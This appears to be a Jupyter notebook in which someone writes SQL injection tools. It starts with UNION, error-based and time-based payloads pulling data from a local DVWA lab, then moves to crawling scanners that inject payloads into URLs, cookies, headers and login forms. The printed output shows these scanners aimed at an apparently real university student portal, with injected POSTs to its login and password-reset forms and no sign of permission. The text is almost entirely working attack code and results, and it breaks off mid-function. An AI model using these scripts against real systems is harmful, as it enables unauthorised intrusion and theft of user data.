payload = "1' UNION SELECT null, database() -- -"

params = {
    'id': payload,
    'Submit': 'Submit'
}

response = requests.get(url, params=params, cookies=cookies)

# Check and print results
if "First name" in response.text and "Surname" in response.text:
    print("[+] Data extraction possible!")
    
    # Extract first name and surname
    first_name_start = response.text.find("First name")
    surname_start = response.text.find("Surname")

    if first_name_start != -1 and surname_start != -1:
        # Extract first name
        first_name_end = response.text.find("<", first_name_start)  # Assuming the first name ends before an HTML tag
        first_name = response.text[first_name_start + len("First name"):first_name_end].strip()
        
        # Extract surname
        surname_end = response.text.find("<", surname_start)  # Assuming the surname ends before an HTML tag
        surname = response.text[surname_start + len("Surname"):surname_end].strip()

        print("\nExtracted Data:")
        print("=" * 50)
        print(f"First Name: {first_name}")
        print(f"Surname: {surname}")
        print("=" * 50)
    else:
        print("[-] Could not find expected data fields in the response.")
else:
    print("[-] Could not extract database name.")


[+] Data extraction possible!

Extracted Data:
First Name: : admin
Surname: : admin


In [57]:
import requests

# Target URL and cookies
url = "http://localhost/vulnerabilities/sqli/"
cookies = {
    'PHPSESSID': 'na9uvrf9ktsnnboe83ik8mjru0',  # your session id
    'security': 'low',
}

# Define different SQL Injection payloads to test
payloads = {
    "Database Name": "1' UNION SELECT null, database() -- -",
    "Table Names": "1' UNION SELECT null, table_name FROM information_schema.tables -- -",
    "Columns of Users Table": "1' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name='users' -- -",
    "First Name and Surname": "1' UNION SELECT null, first_name, surname FROM users -- -",
    "Error-based Database Version": "1' AND 1=CONVERT(int, (SELECT @@version)) -- -",
    "Time-based Injection (Sleep)": "1' AND SLEEP(5) -- -",
}

# Function to execute SQL injection payloads and print results
def execute_sql_injection(payload_name, payload):
    params = {
        'id': payload,
        'Submit': 'Submit'
    }

    response = requests.get(url, params=params, cookies=cookies)

    # Clear output section
    print(f"\n[+] Executing Payload: {payload_name}")
    print("=" * 50)

    if "First name" in response.text and "Surname" in response.text:
        print("[+] Data extraction possible!")
        
        # Extract first name and surname
        first_name_start = response.text.find("First name")
        surname_start = response.text.find("Surname")

        if first_name_start != -1 and surname_start != -1:
            # Extract first name
            first_name_end = response.text.find("<", first_name_start)  # Assuming the first name ends before an HTML tag
            first_name = response.text[first_name_start + len("First name"):first_name_end].strip()
            
            # Extract surname
            surname_end = response.text.find("<", surname_start)  # Assuming the surname ends before an HTML tag
            surname = response.text[surname_start + len("Surname"):surname_end].strip()

            print(f"First Name: {first_name}")
            print(f"Surname: {surname}")
        else:
            print("[-] Could not find expected data fields in the response.")
    elif "error" in response.text.lower():
        print("[+] Error-based Injection Worked! (Database Version or Error Message)")
        print(f"Response Text: {response.text[:300]}...")  # Show part of the error message for debugging
    elif "sleep" in payload:  # Time-based injection (Sleep)
        print("[+] Time-based Blind SQL Injection worked! Server response delayed.")
    else:
        print("[-] No visible data or errors returned from the server.")

    print("=" * 50)

# Execute each payload
for payload_name, payload in payloads.items():
    execute_sql_injection(payload_name, payload)



[+] Executing Payload: Database Name
[+] Data extraction possible!
First Name: : admin
Surname: : admin

[+] Executing Payload: Table Names
[+] Data extraction possible!
First Name: : admin
Surname: : admin

[+] Executing Payload: Columns of Users Table
[+] Data extraction possible!
First Name: : admin
Surname: : admin

[+] Executing Payload: First Name and Surname
[-] No visible data or errors returned from the server.

[+] Executing Payload: Error-based Database Version
[+] Error-based Injection Worked! (Database Version or Error Message)
Response Text: <pre>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'int, (SELECT @@version)) -- -'' at line 1</pre>...

[+] Executing Payload: Time-based Injection (Sleep)
[-] No visible data or errors returned from the server.


In [58]:
import requests
import threading
from queue import Queue

# List of common SQL injection payloads
payloads = [
    "' OR 1=1 -- -",
    "' OR 'a'='a",
    "' UNION SELECT null, null -- -",
    "' AND 1=1 -- -",
    "' AND 'a'='a' -- -",
    "' OR 1=1 LIMIT 1 -- -"
]

# Function to test a single URL for SQL Injection
def test_sqli(url, payload):
    # Construct the URL with the payload
    test_url = f"{url}?id={payload}"

    try:
        response = requests.get(test_url, timeout=5)

        # Check for common SQLi indicators (e.g., error messages or changes in response)
        if "error" in response.text.lower() or "syntax" in response.text.lower() or "unclosed quotation mark" in response.text.lower():
            print(f"[+] SQL Injection vulnerability found on: {test_url}")
            return True
        else:
            return False
    except requests.RequestException as e:
        print(f"[!] Error while accessing {test_url}: {str(e)}")
        return False

# Function to scan a URL for SQL Injection with multiple payloads
def scan_url(url):
    print(f"[*] Scanning {url} for SQL Injection...")
    for payload in payloads:
        if test_sqli(url, payload):
            break

# Function to handle multithreading for scanning multiple URLs
def worker():
    while True:
        url = queue.get()
        if url is None:
            break
        scan_url(url)
        queue.task_done()

# Function to start the scanning process on a list of URLs
def scan_websites(urls):
    global queue

    queue = Queue()
    threads = []

    # Create worker threads
    for i in range(2):  # Adjust number of threads as needed
        t = threading.Thread(target=worker)
        t.start()
        threads.append(t)

    # Add URLs to the queue for scanning
    for url in urls:
        queue.put(url)

    # Wait for all tasks to be completed
    queue.join()

    # Stop the worker threads
    for i in range(2):
        queue.put(None)
    for t in threads:
        t.join()

if __name__ == "__main__":
    # Prompt the user for URLs
    urls = []
    print("Enter the URLs to scan for SQL Injection. Type 'done' to finish entering URLs.")

    while True:
        url = input("Enter URL: ")
        if url.lower() == 'done':
            break
        urls.append(url)

    if urls:
        scan_websites(urls)
    else:
        print("No URLs provided. Exiting...")


Enter the URLs to scan for SQL Injection. Type 'done' to finish entering URLs.


Enter URL:  https://flexstudent.nu.edu.pk/Login
Enter URL:  http://localhost/vulnerabilities/sqli/
Enter URL:  done


[*] Scanning https://flexstudent.nu.edu.pk/Login for SQL Injection...[*] Scanning http://localhost/vulnerabilities/sqli/ for SQL Injection...



In [59]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse

# List of common SQL injection payloads
payloads = [
    "' OR 1=1 -- -",
    "' OR 'a'='a",
    "' UNION SELECT null, null -- -",
    "' AND 1=1 -- -",
    "' AND 'a'='a' -- -",
    "' OR 1=1 LIMIT 1 -- -"
]

# Function to test a URL for SQL Injection
def test_sqli(url):
    for payload in payloads:
        test_url = f"{url}?id={payload}"  # Assuming parameter is 'id'
        
        try:
            response = requests.get(test_url, timeout=5)

            # Check for common SQLi error indicators
            if "error" in response.text.lower() or "syntax" in response.text.lower() or "unclosed quotation mark" in response.text.lower():
                print(f"[+] SQL Injection vulnerability found on: {test_url}")
                return True
            else:
                print(f"[-] No SQL Injection vulnerability found on: {test_url}")
                return False
        except requests.RequestException as e:
            print(f"[!] Error while accessing {test_url}: {str(e)}")
            return False

# Function to crawl a URL and extract all internal links
def crawl(url, visited=set()):
    try:
        # Avoid visiting the same page more than once
        if url in visited:
            return
        visited.add(url)

        print(f"[*] Crawling: {url}")
        
        # Send a GET request to fetch the page content
        response = requests.get(url, timeout=5)
        soup = BeautifulSoup(response.text, 'html.parser')

        # Extract all links from the page
        links = soup.find_all('a', href=True)

        # Check each link
        for link in links:
            href = link['href']

            # Join relative URLs with the base URL
            full_url = urljoin(url, href)

            # If the link is internal, follow it
            if urlparse(full_url).netloc == urlparse(url).netloc:
                crawl(full_url, visited)  # Recursively crawl the link

            # Test for SQLi vulnerabilities
            test_sqli(full_url)
    except requests.RequestException as e:
        print(f"[!] Error while crawling {url}: {str(e)}")

if __name__ == "__main__":
    # Ask the user for URLs to scan
    print("Enter the URLs to scan for SQL Injection vulnerabilities. Type 'done' to finish.")
    
    urls = []
    while True:
        url = input("Enter URL: ")
        if url.lower() == 'done':
            break
        urls.append(url)

    if not urls:
        print("No URLs provided. Exiting...")
    else:
        for url in urls:
            print(f"[*] Starting crawl for SQL Injection on: {url}")
            crawl(url)


Enter the URLs to scan for SQL Injection vulnerabilities. Type 'done' to finish.


Enter URL:  https://flexstudent.nu.edu.pk/Login
Enter URL:  done


[*] Starting crawl for SQL Injection on: https://flexstudent.nu.edu.pk/Login
[*] Crawling: https://flexstudent.nu.edu.pk/Login
[-] No SQL Injection vulnerability found on: https://flexstudent.nu.edu.pk/Login?id=' OR 1=1 -- -
[!] Error while accessing javascript:;?id=' OR 1=1 -- -: No connection adapters were found for "javascript:;?id=' OR 1=1 -- -"
[!] Error while accessing http://nu.edu.pk/?id=' OR 1=1 -- -: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))


In [60]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse

# List of common SQL injection payloads
payloads = [
    "' OR 1=1 -- -",
    "' OR 'a'='a",
    "' UNION SELECT null, null -- -",
    "' AND 1=1 -- -",
    "' AND 'a'='a' -- -",
    "' OR 1=1 LIMIT 1 -- -"
]

# Function to test a URL for SQL Injection
def test_sqli(url):
    for payload in payloads:
        test_url = f"{url}?id={payload}"  # Assuming parameter is 'id'
        
        try:
            response = requests.get(test_url, timeout=5)

            # Check for common SQLi error indicators
            if "error" in response.text.lower() or "syntax" in response.text.lower() or "unclosed quotation mark" in response.text.lower():
                print(f"[+] SQL Injection vulnerability found on: {test_url}")
                return True
            else:
                print(f"[-] No SQL Injection vulnerability found on: {test_url}")
                return False
        except requests.RequestException as e:
            print(f"[!] Error while accessing {test_url}: {str(e)}")
            return False

# Function to crawl a URL and extract all internal links
def crawl(url, visited=set()):
    try:
        # Avoid visiting the same page more than once
        if url in visited:
            return
        visited.add(url)

        print(f"[*] Crawling: {url}")
        
        # Send a GET request to fetch the page content
        response = requests.get(url, timeout=5)
        soup = BeautifulSoup(response.text, 'html.parser')

        # Extract all links from the page
        links = soup.find_all('a', href=True)

        # Check each link
        for link in links:
            href = link['href']

            # Skip javascript-based links
            if href.startswith("javascript:"):
                continue

            # Join relative URLs with the base URL
            full_url = urljoin(url, href)

            # If the link is internal, follow it
            if urlparse(full_url).netloc == urlparse(url).netloc:
                crawl(full_url, visited)  # Recursively crawl the link

            # Test for SQLi vulnerabilities
            test_sqli(full_url)
    except requests.RequestException as e:
        print(f"[!] Error while crawling {url}: {str(e)}")

if __name__ == "__main__":
    # Ask the user for URLs to scan
    print("Enter the URLs to scan for SQL Injection vulnerabilities. Type 'done' to finish.")
    
    urls = []
    while True:
        url = input("Enter URL: ")
        if url.lower() == 'done':
            break
        urls.append(url)

    if not urls:
        print("No URLs provided. Exiting...")
    else:
        for url in urls:
            print(f"[*] Starting crawl for SQL Injection on: {url}")
            crawl(url)


Enter the URLs to scan for SQL Injection vulnerabilities. Type 'done' to finish.


Enter URL:   https://flexstudent.nu.edu.pk/Login
Enter URL:  done


[*] Starting crawl for SQL Injection on:  https://flexstudent.nu.edu.pk/Login
[*] Crawling:  https://flexstudent.nu.edu.pk/Login
[*] Crawling: https://flexstudent.nu.edu.pk/Login
[-] No SQL Injection vulnerability found on: https://flexstudent.nu.edu.pk/Login?id=' OR 1=1 -- -
[!] Error while accessing http://nu.edu.pk/?id=' OR 1=1 -- -: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
[-] No SQL Injection vulnerability found on: https://flexstudent.nu.edu.pk/Login?id=' OR 1=1 -- -
[!] Error while accessing http://nu.edu.pk/?id=' OR 1=1 -- -: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))


In [61]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse, parse_qs

# List of common SQL injection payloads
payloads = [
    "' OR 1=1 -- -",
    "' OR 'a'='a",
    "' UNION SELECT null, null -- -",
    "' AND 1=1 -- -",
    "' AND 'a'='a' -- -",
    "' OR 1=1 LIMIT 1 -- -"
]

# Function to test a URL for SQL Injection on a given parameter
def test_sqli(url, param):
    for payload in payloads:
        test_url = url.replace(param, f"{param}={payload}")  # Inject payload into parameter
        
        try:
            response = requests.get(test_url, timeout=5)

            # Check for common SQLi error indicators
            if "error" in response.text.lower() or "syntax" in response.text.lower() or "unclosed quotation mark" in response.text.lower():
                print(f"[+] SQL Injection vulnerability found on: {test_url}")
                return True
            else:
                print(f"[-] No SQL Injection vulnerability found on: {test_url}")
        except requests.RequestException as e:
            print(f"[!] Error while accessing {test_url}: {str(e)}")
    return False

# Function to extract all URL parameters from a URL
def extract_url_parameters(url):
    query_params = parse_qs(urlparse(url).query)
    return query_params.keys()  # Return all parameter names

# Function to crawl a URL and extract all internal links and test for SQLi
def crawl(url, visited=set()):
    try:
        # Avoid visiting the same page more than once
        if url in visited:
            return
        visited.add(url)

        print(f"[*] Crawling: {url}")
        
        # Send a GET request to fetch the page content
        response = requests.get(url, timeout=5)
        soup = BeautifulSoup(response.text, 'html.parser')

        # Extract all links from the page
        links = soup.find_all('a', href=True)

        # Check each link
        for link in links:
            href = link['href']

            # Skip javascript-based links
            if href.startswith("javascript:"):
                continue

            # Join relative URLs with the base URL
            full_url = urljoin(url, href)

            # If the link is internal, follow it
            if urlparse(full_url).netloc == urlparse(url).netloc:
                crawl(full_url, visited)  # Recursively crawl the link

            # Extract and test URL parameters for SQLi vulnerabilities
            params = extract_url_parameters(full_url)
            if params:
                for param in params:
                    test_sqli(full_url, param)

    except requests.RequestException as e:
        print(f"[!] Error while crawling {url}: {str(e)}")

if __name__ == "__main__":
    # Ask the user for URLs to scan
    print("Enter the URLs to scan for SQL Injection vulnerabilities. Type 'done' to finish.")
    
    urls = []
    while True:
        url = input("Enter URL: ")
        if url.lower() == 'done':
            break
        urls.append(url)

    if not urls:
        print("No URLs provided. Exiting...")
    else:
        for url in urls:
            print(f"[*] Starting crawl for SQL Injection on: {url}")
            crawl(url)


Enter the URLs to scan for SQL Injection vulnerabilities. Type 'done' to finish.


Enter URL:   https://flexstudent.nu.edu.pk/Login
Enter URL:  done


[*] Starting crawl for SQL Injection on:  https://flexstudent.nu.edu.pk/Login
[*] Crawling:  https://flexstudent.nu.edu.pk/Login
[*] Crawling: https://flexstudent.nu.edu.pk/Login


In [63]:
# import requests
# from bs4 import BeautifulSoup
# from urllib.parse import urljoin, urlparse, parse_qs

# # List of common SQL injection payloads
# payloads = [
#     "' OR 1=1 -- -",
#     "' OR 'a'='a",
#     "' UNION SELECT null, null -- -",
#     "' AND 1=1 -- -",
#     "' AND 'a'='a' -- -",
#     "' OR 1=1 LIMIT 1 -- -"
# ]

# # Function to test a URL for SQL Injection on a given parameter
# def test_sqli(url, param):
#     for payload in payloads:
#         test_url = url.replace(param, f"{param}={payload}")  # Inject payload into parameter
        
#         try:
#             response = requests.get(test_url, timeout=5)

#             # Check for common SQLi error indicators in the response text
#             if "error" in response.text.lower() or "syntax" in response.text.lower() or "unclosed quotation mark" in response.text.lower():
#                 print(f"[+] SQL Injection vulnerability found on: {test_url}")
#                 return True
#             else:
#                 print(f"[-] No SQL Injection vulnerability found on: {test_url}")
#         except requests.RequestException as e:
#             print(f"[!] Error while accessing {test_url}: {str(e)}")
#     return False

# # Function to extract all URL parameters from a URL
# def extract_url_parameters(url):
#     query_params = parse_qs(urlparse(url).query)
#     return query_params.keys()  # Return all parameter names

# # Function to crawl a URL and extract all internal links and test for SQLi
# def crawl_and_check_sqli(url):
#     visited = set()

#     try:
#         # Avoid visiting the same page more than once
#         if url in visited:
#             return
#         visited.add(url)

#         print(f"[*] Crawling: {url}")
        
#         # Send a GET request to fetch the page content
#         response = requests.get(url, timeout=5)
#         soup = BeautifulSoup(response.text, 'html.parser')

#         # Extract all links from the page
#         links = soup.find_all('a', href=True)

#         # Check each link
#         for link in links:
#             href = link['href']

#             # Skip javascript-based links
#             if href.startswith("javascript:"):
#                 continue

#             # Join relative URLs with the base URL
#             full_url = urljoin(url, href)

#             # If the link is internal, follow it and crawl
#             if urlparse(full_url).netloc == urlparse(url).netloc:
#                 crawl_and_check_sqli(full_url)  # Recursively crawl the link

#             # Extract and test URL parameters for SQLi vulnerabilities
#             params = extract_url_parameters(full_url)
#             if params:
#                 for param in params:
#                     test_sqli(full_url, param)

#     except requests.RequestException as e:
#         print(f"[!] Error while crawling {url}: {str(e)}")

# if __name__ == "__main__":
#     # Ask the user for a URL to scan
#     url = input("Enter the URL to scan for SQL Injection vulnerabilities: ")

#     print(f"[*] Starting crawl for SQL Injection on: {url}")
#     crawl_and_check_sqli(url)


Enter the URL to scan for SQL Injection vulnerabilities:  


[*] Starting crawl for SQL Injection on: 
[*] Crawling: 
[!] Error while crawling : Invalid URL '': No scheme supplied. Perhaps you meant https://?


In [64]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse, parse_qs

# List of common SQL injection payloads
payloads = [
    "' OR 1=1 -- -",
    "' OR 'a'='a",
    "' UNION SELECT null, null -- -",
    "' AND 1=1 -- -",
    "' AND 'a'='a' -- -",
    "' OR 1=1 LIMIT 1 -- -"
]

# Function to test a URL for SQL Injection on a given parameter
def test_sqli(url, param):
    for payload in payloads:
        test_url = url.replace(param, f"{param}={payload}")  # Inject payload into parameter
        
        try:
            response = requests.get(test_url, timeout=5)

            # Check for common SQLi error indicators in the response text
            if "error" in response.text.lower() or "syntax" in response.text.lower() or "unclosed quotation mark" in response.text.lower():
                print(f"[+] SQL Injection vulnerability found on: {test_url}")
                return True
            else:
                print(f"[-] No SQL Injection vulnerability found on: {test_url}")
        except requests.RequestException as e:
            print(f"[!] Error while accessing {test_url}: {str(e)}")
    return False

# Function to extract all URL parameters from a URL
def extract_url_parameters(url):
    query_params = parse_qs(urlparse(url).query)
    return query_params.keys()  # Return all parameter names

# Function to crawl a URL and extract all internal links and test for SQLi
def crawl_and_check_sqli(url, visited=set()):
    try:
        # Avoid visiting the same page more than once
        if url in visited:
            return
        visited.add(url)

        print(f"[*] Crawling: {url}")
        
        # Send a GET request to fetch the page content
        response = requests.get(url, timeout=5)
        soup = BeautifulSoup(response.text, 'html.parser')

        # Extract all links from the page
        links = soup.find_all('a', href=True)

        # Check each link
        for link in links:
            href = link['href']

            # Skip javascript-based links
            if href.startswith("javascript:"):
                continue

            # Join relative URLs with the base URL
            full_url = urljoin(url, href)

            # If the link is internal, follow it and crawl
            if urlparse(full_url).netloc == urlparse(url).netloc:
                crawl_and_check_sqli(full_url, visited)  # Recursively crawl the link

            # Extract and test URL parameters for SQLi vulnerabilities
            params = extract_url_parameters(full_url)
            if params:
                for param in params:
                    test_sqli(full_url, param)

    except requests.RequestException as e:
        print(f"[!] Error while crawling {url}: {str(e)}")

if __name__ == "__main__":
    # Ask the user for a URL to scan
    url = input("Enter the URL to scan for SQL Injection vulnerabilities: ")

    print(f"[*] Starting crawl for SQL Injection on: {url}")
    crawl_and_check_sqli(url)


Enter the URL to scan for SQL Injection vulnerabilities:   https://flexstudent.nu.edu.pk/Login


[*] Starting crawl for SQL Injection on:  https://flexstudent.nu.edu.pk/Login
[*] Crawling:  https://flexstudent.nu.edu.pk/Login
[*] Crawling: https://flexstudent.nu.edu.pk/Login


In [65]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse, parse_qs

# List of common SQL injection payloads
payloads = [
    "' OR 1=1 -- -",
    "' OR 'a'='a",
    "' UNION SELECT null, null -- -",
    "' AND 1=1 -- -",
    "' AND 'a'='a' -- -",
    "' OR 1=1 LIMIT 1 -- -"
]

# Function to test a URL for SQL Injection on a given parameter
def test_sqli(url, param):
    for payload in payloads:
        test_url = url.replace(param, f"{param}={payload}")  # Inject payload into parameter
        
        try:
            response = requests.get(test_url, timeout=5)

            # Check for common SQLi error indicators in the response text
            if "error" in response.text.lower() or "syntax" in response.text.lower() or "unclosed quotation mark" in response.text.lower():
                print(f"[+] SQL Injection vulnerability found on: {test_url}")
                return True
            else:
                print(f"[-] No SQL Injection vulnerability found on: {test_url}")
        except requests.RequestException as e:
            print(f"[!] Error while accessing {test_url}: {str(e)}")
    return False

# Function to extract all URL parameters from a URL
def extract_url_parameters(url):
    query_params = parse_qs(urlparse(url).query)
    return query_params.keys()  # Return all parameter names

# Function to crawl a URL and extract all internal links and test for SQLi
def crawl_and_check_sqli(url, visited=None):
    if visited is None:
        visited = set()

    try:
        # Avoid visiting the same page more than once
        if url in visited:
            return
        visited.add(url)

        print(f"[*] Crawling: {url}")
        
        # Send a GET request to fetch the page content
        response = requests.get(url, timeout=5)
        soup = BeautifulSoup(response.text, 'html.parser')

        # Extract all links from the page
        links = soup.find_all('a', href=True)

        # Check each link
        for link in links:
            href = link['href']

            # Skip javascript-based links
            if href.startswith("javascript:"):
                continue

            # Join relative URLs with the base URL
            full_url = urljoin(url, href)

            # If the link is internal, follow it and crawl
            if urlparse(full_url).netloc == urlparse(url).netloc:
                crawl_and_check_sqli(full_url, visited)  # Recursively crawl the link

            # Extract and test URL parameters for SQLi vulnerabilities
            params = extract_url_parameters(full_url)
            if params:
                for param in params:
                    test_sqli(full_url, param)

    except requests.RequestException as e:
        print(f"[!] Error while crawling {url}: {str(e)}")

if __name__ == "__main__":
    # Ask the user for a URL to scan
    url = input("Enter the URL to scan for SQL Injection vulnerabilities: ").strip()

    print(f"[*] Starting crawl for SQL Injection on: {url}")
    crawl_and_check_sqli(url)


Enter the URL to scan for SQL Injection vulnerabilities:   https://flexstudent.nu.edu.pk/Login


[*] Starting crawl for SQL Injection on: https://flexstudent.nu.edu.pk/Login
[*] Crawling: https://flexstudent.nu.edu.pk/Login


In [67]:
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup

def extract_forms(url):
    """Extract all forms from the given URL."""
    response = requests.get(url, timeout=10)
    soup = BeautifulSoup(response.text, "html.parser")
    forms = soup.find_all("form")
    
    form_details = []
    
    for form in forms:
        details = {}
        details["action"] = form.get("action")
        details["method"] = form.get("method", "get").lower()
        details["inputs"] = []
        
        for input_tag in form.find_all("input"):
            input_details = {
                "name": input_tag.get("name"),
                "type": input_tag.get("type", "text"),
                "value": input_tag.get("value", "")
            }
            details["inputs"].append(input_details)
        
        form_details.append(details)
    
    return form_details

def test_sqli_in_url(url):
    """Test for SQL Injection in URL query parameters."""
    print(f"[*] Testing URL for SQL Injection: {url}")
    payload = "' OR 1=1 -- -"
    parsed_url = urlparse(url)
    
    # Test the query parameters in the URL
    for param in parsed_url.query.split("&"):
        param_name = param.split("=")[0]
        test_url = f"{url}&{param_name}={payload}"
        
        try:
            response = requests.get(test_url, timeout=10)
            print(f"Response code for {test_url}: {response.status_code}")
            
            # Look for SQL errors or unexpected responses
            if "error" in response.text.lower() or "sql" in response.text.lower():
                print("[+] Potential SQLi vulnerability detected!")
        except requests.exceptions.RequestException as e:
            print(f"Error while sending request to {test_url}: {e}")

def test_sqli_in_cookies(url, cookies):
    """Test for SQL Injection in cookies."""
    print(f"[*] Testing cookies for SQL Injection on: {url}")
    payload = "' OR 1=1 -- -"
    cookies_to_test = cookies.copy()
    
    for cookie_name in cookies_to_test:
        cookies_to_test[cookie_name] = payload  # Inject payload into the cookie
        
        try:
            response = requests.get(url, cookies=cookies_to_test, timeout=10)
            print(f"Response code with injected cookie: {response.status_code}")
            
            # Check for SQL errors or unexpected behaviors
            if "error" in response.text.lower() or "sql" in response.text.lower():
                print("[+] Potential SQLi vulnerability detected in cookies!")
        except requests.exceptions.RequestException as e:
            print(f"Error while sending request with injected cookie: {e}")

def test_sqli_in_headers(url):
    """Test for SQL Injection in HTTP headers."""
    print(f"[*] Testing headers for SQL Injection on: {url}")
    payload = "' OR 1=1 -- -"
    headers_to_test = {
        "User-Agent": payload,
        "Referer": payload
    }
    
    try:
        response = requests.get(url, headers=headers_to_test, timeout=10)
        print(f"Response code with injected headers: {response.status_code}")
        
        # Look for SQL errors or unexpected responses
        if "error" in response.text.lower() or "sql" in response.text.lower():
            print("[+] Potential SQLi vulnerability detected in headers!")
    except requests.exceptions.RequestException as e:
        print(f"Error while sending request with injected headers: {e}")

def test_sqli_in_forms(url, form):
    """Test SQL Injection on a specific form."""
    form_action = form.get("action")
    form_url = urljoin(url, form_action)
    
    payload = "' OR 1=1 --"
    form_data = {}
    
    for input_tag in form["inputs"]:
        input_name = input_tag["name"]
        form_data[input_name] = payload  # Use payload for testing
        
    try:
        if form.get("method") == "post":
            response = requests.post(form_url, data=form_data, timeout=10)
        else:
            response = requests.get(form_url, params=form_data, timeout=10)
        
        print(f"Response code: {response.status_code}")
        
        if "error" in response.text.lower() or "sql" in response.text.lower():
            print("[+] Potential SQLi vulnerability detected in form!")
    except requests.exceptions.RequestException as e:
        print(f"Error while sending request to form: {e}")

def main():
    url = input("Enter the URL to scan: ")
    
    # Test SQL Injection in URL
    test_sqli_in_url(url)
    
    # Test SQL Injection in Cookies (if any)
    cookies = {}  # Replace with actual cookies if necessary
    test_sqli_in_cookies(url, cookies)
    
    # Test SQL Injection in Headers
    test_sqli_in_headers(url)
    
    # Extract forms and test for SQL Injection in forms
    forms = extract_forms(url)
    
    print(f"[+] Found {len(forms)} form(s) on {url}")
    
    for i, form in enumerate(forms, 1):
        print(f"\nTesting form #{i}:")
        print(f"Action: {form['action']}")
        print(f"Method: {form['method']}")
        for input_tag in form["inputs"]:
            print(f"Input Name: {input_tag['name']}, Type: {input_tag['type']}, Value: {input_tag['value']}")
        
        # Test for SQL Injection on this form
        test_sqli_in_forms(url, form)

if __name__ == "__main__":
    main()


Enter the URL to scan:   https://flexstudent.nu.edu.pk


[*] Testing URL for SQL Injection:  https://flexstudent.nu.edu.pk
Error while sending request to  https://flexstudent.nu.edu.pk&=' OR 1=1 -- -: HTTPSConnectionPool(host="flexstudent.nu.edu.pk&='%20or%201=1%20--%20-", port=443): Max retries exceeded with url: / (Caused by NameResolutionError("<urllib3.connection.HTTPSConnection object at 0x000002EAA9DBE4E0>: Failed to resolve 'flexstudent.nu.edu.pk&='%20or%201=1%20--%20-' ([Errno 11001] getaddrinfo failed)"))
[*] Testing cookies for SQL Injection on:  https://flexstudent.nu.edu.pk
[*] Testing headers for SQL Injection on:  https://flexstudent.nu.edu.pk
Response code with injected headers: 200
[+] Found 2 form(s) on  https://flexstudent.nu.edu.pk

Testing form #1:
Action: /Login/login
Method: post
Input Name: username, Type: text, Value: 
Input Name: password, Type: password, Value: 
Input Name: remember, Type: checkbox, Value: 
Response code: 200

Testing form #2:
Action: /Login/ForgotPassword
Method: post
Input Name: email, Type: text,

In [71]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse

def extract_forms(url):
    """
    Extract all forms from the given URL.
    Returns a list of form objects.
    """
    response = requests.get(url, timeout=10)
    soup = BeautifulSoup(response.text, "html.parser")
    
    # Find all form elements on the page
    forms = soup.find_all("form")
    
    # List to store form details
    form_details = []
    
    for form in forms:
        details = {}
        details["action"] = form.get("action")
        details["method"] = form.get("method", "get").lower()
        details["inputs"] = []
        
        # Collect all input elements inside the form
        for input_tag in form.find_all("input"):
            input_details = {
                "name": input_tag.get("name"),
                "type": input_tag.get("type", "text"),
                "value": input_tag.get("value", "")
            }
            details["inputs"].append(input_details)
        
        form_details.append(details)
    
    return form_details
def test_sqli_in_url(url):
    """Test for SQL Injection vulnerabilities in URL query parameters."""
    print(f"[*] Testing URL for SQL Injection: {url}")
    
    # List of payloads for SQL Injection testing
    payloads = [
        "' OR 1=1 --",  # Basic SQLi payload
        "' OR 'a'='a",   # Always true condition
        "' UNION SELECT NULL, NULL -- -",  # Union-based SQLi
    ]
    
    # Parse the URL to check for query parameters
    parsed_url = urlparse(url)
    
    # If there are query parameters in the URL
    if parsed_url.query:
        query_params = parsed_url.query.split("&")
        for param in query_params:
            param_name = param.split("=")[0]
            for payload in payloads:
                # Build the URL with the payload injected into the query parameter
                test_url = urljoin(url, f"{parsed_url.path}?{param_name}={payload}")
                print(f"[*] Testing with URL: {test_url}")
                
                try:
                    response = requests.get(test_url, timeout=10)
                    print(f"Response code for {test_url}: {response.status_code}")
                    
                    # Check if SQL-related errors are present in the response
                    if "error" in response.text.lower() or "sql" in response.text.lower():
                        print("[+] Potential SQLi vulnerability detected!")
                    else:
                        print("[-] No obvious signs of SQLi, but check manually.")
                
                except requests.exceptions.RequestException as e:
                    print(f"Error while sending request to {test_url}: {e}")
    else:
        print("[*] No query parameters found in URL.")

def test_sqli_in_form(url, form):
    """Test for SQL Injection in forms using injected payloads."""
    # Extract the form action URL and ensure it's a full URL
    form_action = form.get("action")
    form_url = urljoin(url, form_action)
    
    # List of SQL Injection payloads to test
    payloads = [
        "' OR 1=1 --",  # Basic SQLi payload
        "' OR 'a'='a",   # Always true condition
        "' UNION SELECT NULL, NULL -- -",  # Union-based SQLi
    ]
    
    for input_tag in form["inputs"]:
        form_data = {}
        csrf_token = None
        
        # Look for a hidden CSRF token and the regular form inputs
        for input_tag in form["inputs"]:
            input_name = input_tag["name"]
            if input_name == "user_token":  # CSRF token field
                csrf_token = input_tag["value"]
            elif input_name:
                form_data[input_name] = payload  # Use payload for testing
        
        # Include CSRF token in the form data if found
        if csrf_token:
            form_data["user_token"] = csrf_token
        
        print(f"[*] Testing payload: {payload} on {form_url}")
        
        try:
            if form.get("method") == "post":
                response = requests.post(form_url, data=form_data, timeout=10)
            else:
                response = requests.get(form_url, params=form_data, timeout=10)
            
            print(f"Response code: {response.status_code}")
            
            # Check if SQL-related errors are present in the response
            if "error" in response.text.lower() or "sql" in response.text.lower():
                print("[+] Potential SQLi vulnerability detected!")
            else:
                print("[-] No obvious signs of SQLi, but check manually.")
        
        except requests.exceptions.RequestException as e:
            print(f"Error while sending request: {e}")

def main():
    url = input("Enter the URL to scan for SQL Injection: ")

    # First test for SQL Injection in URL query parameters
    test_sqli_in_url(url)

    # Now test for forms on the page
    forms = extract_forms(url)
    
    print(f"[+] Found {len(forms)} form(s) on {url}")
    
    for i, form in enumerate(forms, 1):
        print(f"\nForm #{i} Details:")
        print(f"Action: {form['action']}")
        print(f"Method: {form['method']}")
        for input_tag in form["inputs"]:
